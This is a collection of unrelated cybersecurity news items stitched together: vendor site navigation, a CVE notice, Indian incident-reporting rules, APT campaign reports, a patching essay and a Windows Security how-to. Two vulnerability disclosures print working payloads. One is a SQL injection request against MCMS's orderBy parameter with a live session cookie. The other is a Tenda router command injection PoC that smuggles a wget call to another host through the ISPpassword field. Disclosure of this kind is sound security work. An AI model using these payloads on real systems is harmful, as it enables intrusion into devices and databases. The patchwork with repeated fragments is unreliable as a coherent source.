Links may not be rewritten according to policy in some specially formatted emails.

Uncover the highly evasive adaptive threats (HEAT) causing ransomware attacks.

 

Most Searched

*   Secure Web Gateway (SWG) 101: Your primer to an isolation-based approach to cybersecurity
*   Hiding in plain sight: New Adwind jRAT Variant Uses normal Java commands to mask its behavior
*   U.S. Department of Defense (DoD) leads the industry with cloud-based internet isolation program
*   ISOMorph Infection: In-Depth Analysis of a New HTML Smuggling Campaign
*   Increase In Drive-by Attack: SocGholish Malware Downloads

*   Why Menlo
    
    **Why Menlo**
    
    Traditional security approaches are flawed, costly, and overwhelming for security teams. Menlo Security is different. It’s the simplest, most definitive way to secure work—making online threats irrelevant to your users and your business.
    
    Why Menlo
    
*   Products
    
    **Products**
    
    *   Products Overview
    *   Secure Web Gateway
    *   Remote Browser Isolation
    *   Email Isolation
    *   CASB
    *   DLP
    *   Menlo Private Access
    *   Cloud Firewall
    *   Isolation Security Operations Center
    
*   Solutions
    
    **Solutions**
    
    *   Solutions Overview
    *   Eliminate phishing & ransomware
    *   Seamless ransomware prevention
    *   Gain visibility & control over data loss
    *   Control access to SaaS applications
    *   Implement Secure Access Service Edge (SASE)
    *   Secure access to private applications
    *   Secure Microsoft 365 & Google Workspace
    *   Secure remote work
    *   Mobile malware prevention
    *   Virtual network separation
    *   Neutralize malicious document downloads
    *   Migrate on-premise proxy to Cloud SWG
    
*   Resources
    
    **Threat intelligence is on tap at Menlo Labs**
    
    Menlo Labs provides insights, expertise, context and tools to aid customers on their journey to connect, communicate and collaborate securely without compromise. The collective is made up of elite security researchers that put a spotlight on the threats you know and don’t know about.
    
    Learn More
    
*   About
    
    **Company**
    
    *   About Us
    *   Management Team
    *   Board of Directors
    *   Investors
    *   Customers
    *   Partners
    *   Technology Partners
    *   Contact Us
    

*   Demo

 

Most Searched

*   Secure Web Gateway (SWG) 101: Your primer to an isolation-based approach to cybersecurity
*   Hiding in plain sight: New Adwind jRAT Variant Uses normal Java commands to mask its behavior
*   U.S. Department of Defense (DoD) leads the industry with cloud-based internet isolation program
*   ISOMorph Infection: In-Depth Analysis of a New HTML Smuggling Campaign
*   Increase In Drive-by Attack: SocGholish Malware Downloads

****  
CVE ID: CVE-2022-24974****

Product: Email Isolation On-Premise  
Affected versions: 2.81.1 – 2.81.8  
Fixed in 2.81.9+  
Description: “Links may not be rewritten according to policy in some specially formatted emails.”  
Reported by: Anonymous

CVE-2022-24974: Published security vulnerabilities - Menlo Security

CERT-In updates cybersecurity rules to include mandatory reporting, record-keeping, and more.

The Indian Computer Emergency Response Team (CERT-In) issued new cyber incident reporting guidelines, including the requirement for service providers, intermediaries, data centers, corporations, and government agencies to report cyber incidents to the regulator within six hours.

The new government-issued cybersecurity rules will take effect in 60 days.

Incidents requiring immediate CERT-In notification include:

*   Targeted scanning/probing of critical networks/systems
*   Compromise of critical systems/information
*   Unauthorized access of IT systems/data
*   Defacement of website or intrusion into a website and unauthorized changes such as inserting malicious code, links to external websites, etc.
*   Malicious code attacks such as spreading of virus/ worm/ Trojan/ bots/ spyware/ ransomware/ cryptominers
*   Attack on servers such as database, mail, and DNS, and network devices such as routers
*   Identity theft, spoofing, and phishing attacks
*   Denial of service (DoS) and distributed denial of service (DDoS) attacks
*   Attacks on critical infrastructure, SCADA and operational technology systems, and wireless networks
*   Attacks on applications such as e-governance, e-commerce, etc.
*   Data breach
*   Data leak
*   Attacks on Internet of Things (IoT) devices and associated systems, networks, software, and servers
*   Attacks or incident affecting digital payment systems
*   Attacks through malicious mobile apps
*   Fake mobile apps
*   Unauthorized access to social media accounts
*   Attacks or malicious/ suspicious activities affecting cloud computing systems/ servers/ software/ applications
*   Attacks or malicious/suspicious activities affecting systems/ servers/ networks/ software/ applications related to big data, blockchain, virtual assets, virtual asset exchanges, custodian wallets, robotics, 3D and 4D printing, additive manufacturing, and drones
*   Attacks or malicious/ suspicious activities affecting systems/ servers/software/ applications related to artificial intelligence and machine learning

Other new rules require service providers and their intermediaries, data centers, corporations, and government agencies to connect to the Network Time Protocol (NTP) server of the National Informatics Center (NIC) or National Physical Laboratory (NPL) — or with servers that can be traced back to one of those two servers — and synchronize their ICT system clocks with the government's.

These organizations will also need to start keeping logs for the previous 180 days and provide it to CERT-In if an incident occurs, the new guidelines said.

The tightening up of reporting rules is intended to close "certain gaps causing hinderance in incident analysis," the Ministry of Electronics & IT said in its statement announcing the new cybersecurity measures. "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

New Regulations in India Require Orgs to Report Cyber Incidents Within 6 Hours

MCMS v5.2.27 was discovered to contain a SQL injection vulnerability in the orderBy parameter at /dict/list.do.

A suspicious point was found in the IDictDao.xml file in the lib,ms-mdiy-2.1.12  
.net.mingsoft.mdiy.dao.IDictDao.xml#145  

Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in net.mingsoft.mdiy.action.DictAction and found a call to

net.mingsoft.mdiy.biz.dictBiz#query  

we can know that the suspicious injection point is orderBy, and then try to inject

    
    GET /ms/mdiy/dict/list.do?pageNo=1&pageSize=22&orderBy=1/**/or/**/updatexml(1,concat(0x7e,user(),0x7e),1)/**/or/**/1 HTTP/1.1
    Host: 10.28.246.83:8080
    Content-Length: 0
    Pragma: no-cache
    Accept: application/json, text/plain, */*
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Origin: http://10.28.246.83:8080
    Referer: http://10.28.246.83:8080/ms/mdiy/dict/index.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=AAF6841C2E815174E1AF5498DBEDD12F; rememberMe=d56VV14gjxKRUu7SYYOTuOS8X48lfVhblbN4aL/wCBkaL805vU01qmEfZCk2PpqohqQ4bUuxyGvEzVrXqlVgeKFxrQHcgxhKPbzopVs4p5ftVg3+jnz3WkOHLrycrJKOVR+peOYM+3bbysPywLp/w/PGdFU0+ooXhCJbO8qMeXvR6U6RSTOOnvBq/P9ySYdwnqt0uIywoCNv8hE6gAgnhZUt4PBYLlZ4EekzFyLDqKJXJ5sOUuzR8/fPGjOoVzMydW3EIFJ0f2i59RQJe4fsx6i1NlnR1C9muMEaDUqj70Ec+M50tjnStsJNPCrSYzl2+KMzPXpoBS1DWCpURi5/ZCBp/FahWwnJZ6cA0owYZC9dXNC1b1FQoC2fIO5SPcNtEyySdD6c6BnA9Leei5iYTEIkPKHIw1oQhF7voRadkfW40ZmdPUTot5Gd8g7pDqpNNd/sig45EQtGqeXWwP45T2BcE1OKkPC9D+ELtqQSzOWcu7GUQkJ7jsECXu+ghoq/uihlh5Xdx1a8H8hhznmpJJd3hK2W+fy1IBAiH4GzkhQbepycUPqxD0t+ufNTFN5B0upouiyMiHSLejjdIkCl325p4rLi8TchVRxsKS0/Z9PflifFvaauQoTalNDa+vZXYvBrnVjXyRl3cUn4HPzTPBVNpXqnHPxf1jNtxtJKL09szd3OMRABDyIvL+T0JHl8pskKjEo80luOEP5f+ta2TW1XutmZJupbr6d97mfeRE9GDIYWFuHafXkh5uSBTkauPpQA7x25vhs1BjU5OVZ2ipfcPvH6WaPCcBJYM8Vqyd6g+5mdpsw7Hb27LcGxFo9dE39pBNjy8+1q6QqIojSfTRLfz1f/wGKgdOqy3x9z2+0SYi+irxF52r7FQgBZtTcGUu+1WPJJQEmG3BnUAkI7hpG1BmmjeHjDRgnOvA+L1LugHVQUYNN/Z8XzahHcDkNHr54/WXeQP56p0LC/E/D+XMCOSxCYkYnZdboRABf4Hwj+THJSTp+ZRsFjrZt27WWhJtDfGTgahpJLPioFUT/3HCnZKz529Ia9R1dTMHaKlxYrxf04GvgNCiFmslLqZX+9RlZizYNXCLRKECj83ovRCFJP5Ofg9SK+fNKNruL4uW5U4B+vLEuLhxCv7BzGFpjjciIOh8z6ypCQJDkuYUv/rffs0F1ngGI8TdAKhFxMnVbyUplk0+cYVQaBx1JTablsA+VgSl8n8+qhDoNA44TBg4OsrTaSMhcCha5b7OwczozSFDvJOR15GXgIKbJOTGSAJ5JhFFeQhkmpVWOGC4d9KdmHl6KUIOyB8DtO2ZU/XpTPbvFQGLvyyo1t7dPrvzHqG9LYmoQAcye6278=
    Connection: close

CVE-2022-27466: MCMS 5.2.7 SQLI · Issue #90 · ming-soft/MCMS

According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don’t work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves. 
For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first.
The reason? In 2010,

According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don't work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves.

For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first.

The reason? In 2010, just under 5000 CVEs were recorded in the MITRE vulnerabilities database. By 2021, the yearly total had skyrocketed to over 20,000. Today, software and network integrity are synonymous with business continuity. And this makes the issue of which vulnerabilities to address first mission-critical. Yet owing to the countless documented vulnerabilities lurking in a typical enterprise ecosystem – across thousands of laptops, servers, and internet-connected devices – less than one in ten actually needs to be patched. The question is: how can we know which patches will ensure that our sieve doesn't sink?

This is why more and more companies are turning to Vulnerability Prioritization Technology (VPT). They seek solutions that filter out the flood of false positives generated by legacy tools and poorly-configured solutions and address only those vulnerabilities that directly affect their networks. They're leaving traditional vulnerability management paradigms behind and shifting to the next generation of VPT solutions.

****The Evolution of Vulnerability Management****

It's not news that even the most resource-rich enterprise can't possibly sort through, prioritize and patch every single vulnerability in their ecosystem. That's why the shift toward VPT started in the first place.

Initially, Vulnerability Management (VM) focused on scanning and detecting core networks for any vulnerabilities. This was known as Vulnerability Assessment (VA), and the deliverable was a massively long list of vulnerabilities that had little practical value for already overextended IT resources.

To make VA more actionable, the next generation of VM tools included vulnerability prioritization based on each vulnerability's global CVE scoring. This was further refined by adding another layer of prioritization based on estimations of potential damage, threat context, and, ideally, a correlation with local context to evaluate the potential business impact based on DREAD type models. This more advanced approach is known as Risk Based Vulnerability Management (RBVM) and was a giant leap forward from VA.

Yet even advanced VM tools implementing RBVM lag behind in sophistication and actionability. These tools can only detect what they know – meaning that misconfigured detection tools frequently result in missed attacks. They cannot evaluate whether security controls are configured to compensate for the severity of a given vulnerability according to its CVE score correlated with local context risk. This still results in bloated patching lists and also means that - just like with early-gen VA tools - patching often ends up at the bottom of the to-do list or is simply ignored by IT teams.

****Leveraging Next-Gen VPT****

Advanced VPT solutions are the next generation of VM – offering organizations a very different view of their unique cyber risks.

Building on traditional VA detection and more advanced RBVM capabilities, the latest generation of VPT solutions adds asset criticality context, environmental context, and multiple, pre-integrated threat intelligence sources. In this way, it effectively augments vulnerability severity data with sophisticated analytics and in-context applicability. These analytical capabilities enable advanced VPT solutions to integrate highly granular threat validation – creating the next generation of capabilities that augment traditional VM: Attack Based Vulnerability Management (ABVM).

ABVM is a game-changer. Because once network stakeholders are able to effectively validate the real-world threats facing their networks, they can test their environments based on actual exposure levels and permeability to attack. According to Gartner, the shift towards ABVM is crucial to better prioritization and assessment of vulnerabilities. It empowers security and risk management leaders to both generate recommendations and apply them directly to their security programs – addressing prioritized findings.

Leveraging ABVM, security stakeholders can identify _all_ undetected attacks, generate data and use cases that enable continuous improvement of detection and response tool configuration, and map out potential end-to-end attack paths with detailed local context. Once these yet unsecured attack paths are clearly mapped out, patching is too because threat validation coupled with a deep understanding of attack paths enables laser-focused patching prioritization. With ABVM, optimizing scarce patching resources to plug only those holes that threaten to sink the sieve becomes straightforward.

The move from traditional score-based VA or RBVM approaches to ABVM can lower patching load by 20%-50% while markedly improving overall security posture. By preventing security drift, ABVM also helps streamline SIEM toolsets – improving tool configuration, eliminating overlap, and identifying missing capabilities.

****The Bottom Line****

By improving security, reducing costs, refining resource allocation, and strengthening collaboration between teams, ABVM offers a new horizon of productivity and efficacy for security teams. Taking traditional VPT to the next level, ABVM solves chronic vulnerability patching overload, enabling networks to remain afloat even in today's threat-choked waters.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Which Hole to Plug First? Solving Chronic Vulnerability Patching Overload

A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information.
"The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week.
"The target of this attack is currently unknown but with high

A Chinese state-sponsored espionage group known as **Override Panda** has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information.

"The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week.

"The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

Override Panda, also called Naikon, Hellsing, and Bronze Geneva, is known to operate on behalf of Chinese interests since at least 2005 to conduct intelligence-gathering operations targeting ASEAN countries.

Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malware.

Last April, the group was linked to a wide-ranging cyberespionage campaign directed against military organizations in Southeast Asia. Then in August 2021, Naikon was implicated in cyberattacks targeting the telecom sector in the region in late 2020.

The latest campaign spotted by Cluster25 is no different in that it leverages a weaponized Microsoft Office document to kick-start the infection killchain that includes a loader designed to launch a shellcode, which, in turn, injects a beacon for the Viper red team tool.

Available for download from GitHub, Viper is described as a "graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration."

The framework, similar to Cobalt Strike, is said to feature over 80 modules to facilitate initial access, persistence, privilege escalation, credential Access, lateral movement, and arbitrary command execution.

"By observing Naikon APT's hacking arsenal, it was concluded that this group tends to conduct long-term intelligence and espionage operations, typical for a group that aims to conduct attacks on foreign governments and officials," the researchers pointed out.

"To avoid detection and maximize the result, it changed different \[tactics, techniques, and procedures\] and tools over time."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese "Override Panda" Hackers Resurface With New Espionage Attacks

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting 'remote everything'.

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting ‘remote everything’.

The rise of remote work and learning opened new opportunities for many people – as we’ve seen by the number of people who have moved to new places or adapted to “workcations.” Cybercriminals are taking advantage of the same opportunities – just in a different way. Evaluating the prevalence of malware variants by region reveals a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector.

****What Malware Trends are Showing****

Our FortiGuard Labs research team dug into the prevalence of malware variants by region for the second half of 2021. What they found shows a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector. The team found that various forms of browser-based malware were prevalent. Often, this takes the form of phishing lures or scripts that inject code or redirect users to malicious sites.

Detections vary across regions, of course, but can be largely grouped into three broad distribution mechanisms: Microsoft Office executables (MSExcel/, MSOffice/), PDF files and browser scripts (HTML/, JS/). Files packed with the Microsoft Intermediate Language (MSIL) are another common feature.

It’s worthy of note that some kinds of browser-based malware occupy the top spots in all regions. Such techniques have gained prominence recently as a way to exploit peoples’ desire for the latest news about COVID-19, politics, sports or any current headline. And since many are browsing from their home networks these days, there are fewer layers of protection between such malware and would-be victims (e.g., no corporate web filters).

****The Rise of Exploit Kits****

The use of exploit kits (EKs) is one element that has clearly helped cybercriminals in their efforts to execute malware. These kits are automated programs attackers use to exploit systems or applications. What makes an exploit kit very dangerous is its ability to identify victims while they browse the web. After they target a potential victim’s vulnerabilities, attackers can download and execute their malware of choice.

Exploit kits work automatically and silently as they look for vulnerabilities on a user’s machine while they browse the web. Currently, exploit kits are the preferred method for the distribution of remote access tools (RATs) or mass malware by cybercriminals, especially those seeking to profit financially from an exploit.

What’s especially insidious is that EKs don’t require victims to download a file or attachment. The victim need only browse on a compromised website, and then that site pulls in hidden code that attacks vulnerabilities in the user’s browser.

Currently, older kits are available to the public. Attackers have been taking these older kits and modifying them, making them more resilient to newer security detection strategies. Also, many of these kits are being advertised for sale online. Attackers offer these kits for rent on these sites and offer support and update contracts to guarantee they work against future updates.

****Addressing the Remote Everything Security Problem****

As hybrid work and learning become embedded paradigms in our culture, there are fewer layers of protection between malware and would-be victims. And bad actors are gaining access to more tools to help them pull off their nefarious deeds – like exploit kits. At the same time, the attack surface has rapidly expanded and continues to do so.

That means enterprises must take a work-from-anywhere approach to their security. They need to deploy solutions capable of following, enabling and protecting users no matter where they are located. They need security on the endpoint (EDR) combined with zero trust network access (ZTNA) approaches.

Another vital component and best practice of modern security strategy is the development of a holistic security mesh, wherein fully integrated security, services and threat intelligence seamlessly follow users on the road, at home or in the office to provide enterprise-grade protection and productivity across the extended network.

This simplifies and satisfies the demands of today’s three most common WFA scenarios: the corporate office, the home office and the mobile worker. Enterprises must secure mission-critical applications, so securing access to those applications, the networks to connect to those applications, and the devices that run those applications remain a vital component of a layered defense – even when working from a traditional location.

In the home office, risk lurks in the home networks that are often poorly secured with retail wireless routers and contain vulnerable IoT devices, which can be a pathway for hacker to gain access. And mobile workers regularly rely on untrusted and unsecured networks to access critical business resources. This can introduce unique threats, enabling cybercriminals to launch attacks against inadequately protected devices or intercept exposed communications.

A holistic integration of endpoint security, network security and ZTA/ZTNA addresses the challenges that WFA presents.

Criminals will make the most of any possible threat scenario, and the past two years have provided many opportunities for network attack. Malware trends and the rise of exploit kits have proven this point, and it’s now incumbent upon IT security teams to re-evaluate their security posture and adjust as needed. A comprehensive, integrated security mesh that accounts for all work possibilities is a best practice.

**_Aamir Lakhani is cybersecurity researcher and practitioner at FortiGuard Labs_.**

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Bad Actors Are Maximizing Remote Everything

A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022.
Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (

A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022.

Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652).

"This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," the Mandiant said in a report published last week.

The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities.

These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout) that, when opened, triggers an infection sequence that delivers and executes a downloader dubbed BEATDROP on a target system.

Written in C, BEATDROP is designed to retrieve next-stage malware from a remote command-and-control (C2) server. It achieves this by abusing Atlassian's Trello service to store victim information and fetch AES-encrypted shellcode payloads to be executed.

Also employed by APT29 is a tool named BOOMMIC (aka VaporRage) to establish a foothold within the environment, followed by escalating their privileges within the compromised network for lateral movement and extensive reconnaissance of hosts.

What's more, a subsequent operational shift observed in February 2022 saw the threat actor pivoting away from BEATDROP in favor of a C++-based loader referred to as BEACON, potentially reflecting the group's ability to periodically alter their TTPs to stay under the radar.

BEACON, programmed in C or C++, is part of the Cobalt Strike framework that facilitates arbitrary command execution, file transfer, and other backdoor functions such as capturing screenshots and keylogging.

The development follows the cybersecurity company's decision to merge the uncategorized cluster UNC2452 into APT29, while noting the highly sophisticated group's propensity for evolving and refining its technical tradecraft to obfuscate activity and limit its digital footprint to avoid detection.

Nobelium, notably, breached multiple enterprises by means of a supply chain attack in which the adversary accessed and tampered with SolarWinds source code, and used the vendor's legitimate software updates to spread the malware to customer systems.

"The consistent and steady advancement in TTPs speaks to its disciplined nature and commitment to stealthy operations and persistence," Mandiant said, characterizing APT29 as an "evolving, disciplined, and highly skilled threat actor that operates with a heightened level of operational security (OPSEC) for the purposes of intelligence collection."

The findings also coincide with a special report from Microsoft, which observed Nobelium attempting to breach IT firms serving government customers in NATO member states, using the access to siphon data from Western foreign policy organizations.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia

Your Microsoft computer comes with built-in safety software that shields you from the worst threats. Here's how to navigate your toolkit.

For many years, Windows users had to rely on a third-party security tool to keep viruses and malware at bay, but now Microsoft's operating system comes with its own package, in the form of Windows Security.

It's designed to run quietly and efficiently in the background, and you might not have even noticed it's there—but it's important to know how it's keeping your computer safe, and the various options it gives you.

While you can add extra security software to Windows if you want, Windows Security should keep you well protected from danger. You can open it from the Start menu or by clicking its icon in the notification area.

Finding Your Way Around

Windows Security gives you an overview of your system's status.

Microsoft via David Nield

Open the main Windows Security dashboard and you should see a grid of icons, all with reassuring green check marks next to them—if something needs your attention, these check marks will be replaced by yellow exclamation marks. You can click on any of the items on the grid, from **Virus & threat protection** to **Protection history**, to jump to the relevant section inside the app.

The navigation pane on the left gives you another way of jumping between the various parts of Windows Security: The **Home** option is the one to go back to if you need to return to the main dashboard. Choose **Account protection**, for example, for options relating to your Microsoft account and to the way you sign in to Windows on your computer (including face and fingerprint recognition, if available).

**Firewall & network protection** is where you can monitor the firewall put up around Windows, for devices on your local network and in terms of the wider internet. If you decide to install a third-party security package, Windows Security can monitor this too and make sure everything is working correctly—if no firewall is active, you'll see an on-screen warning.

Choose **Settings** from the left-hand navigation bar to customize various aspects of Windows Security: These are mainly around the notifications the program displays, and any third-party security software you've installed. You're also able to click **Protection history** here to see what Windows Security has been up to recently, whether that's virus scans or alerts about security problems.

Running Virus and Malware Scans

Windows Security runs scans in the background while you use your device.

Microsoft via David Nield

In terms of actively keeping your computer safe and protected from threats, the **Virus & threat protection** section of Windows Security is the place to visit. As with the rest of the software, most of the features here will run in the background, but it's good to be aware of what's available and what you can do if you spot anything suspicious.

Click **Quick scan** if you suspect your computer may have been compromised—if you've downloaded and launched an email attachment you shouldn't have, for example. Quick Scan will look out for the most obvious threats and malware on your system and shouldn't take long to complete. You'll be able to see the progress of the scan as it runs, and you can keep working on your computer while it's scanning.

Select **Scan options** to run other types of scans. There's a **Full scan** option, which is more comprehensive than a quick scan and can take over an hour to complete, while a **Custom scan** enables you to focus a scan on specific folders if you think you know where a particular threat might be located. Finally, you'll see an **Offline scan** option that takes around 15 minutes and can remove the most stubborn types of malware.

You don't need to worry about setting a schedule for running virus and malware scans because Windows Security will take care of all of this for you. Click **Manage settings** under **Virus & threat protection settings** to make sure the **Real-time protection** option is turned on: This ensures the program is actively working in the background to spot security threats before they can do any damage to your system.

Other Windows Security Features

Windows Security looks after device maintenance too.

Microsoft via David Nield

If you pick **App & browser control** from the navigation pane on the left of Windows Security, you can have the software scan any applications you download and install: Windows Security considers a variety of factors when assessing whether a program is allowed to run on your computer, and you can customize some of this functionality here.

Select **Device security** to get to some of the more advanced security settings for your system. If your computer supports technologies like secure boot (checking for threats as your system starts up) and a trusted platform module (making it very difficult to tamper with the data on your system), you'll see them here. There are no settings to work through, but you can see if the features are present and working properly.

Then there's the **Device performance & health** page, which shows how Windows Security goes beyond actual security. Here you can see reports on the internal storage and battery of the device you're running Windows on and access what Microsoft calls a **Fresh start** process—this resets a lot of the settings on your system without affecting any of your files or the applications you've installed.

The **Family options** screen will be useful if you've got youngsters using Windows: You can set parental controls covering everything from the times the device can be used to what sort of content can be accessed. This works in tandem with the Microsoft Family Safety tools that you can access through your browser and that can cover multiple devices using the same Microsoft account.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   The takedown of the web’s biggest child abuse site
*   Get ready for a decade of uranus jokes
*   How to use BeReal, the “unfiltered” social media app
*   Should all video games be replayable?
*   The fake agents case baffling US intelligence experts
*   👁️ Explore AI like never before with our new database
*   📱 Torn between the latest phones? Never fear—check out our iPhone buying guide and favorite Android phones

Tag

#intel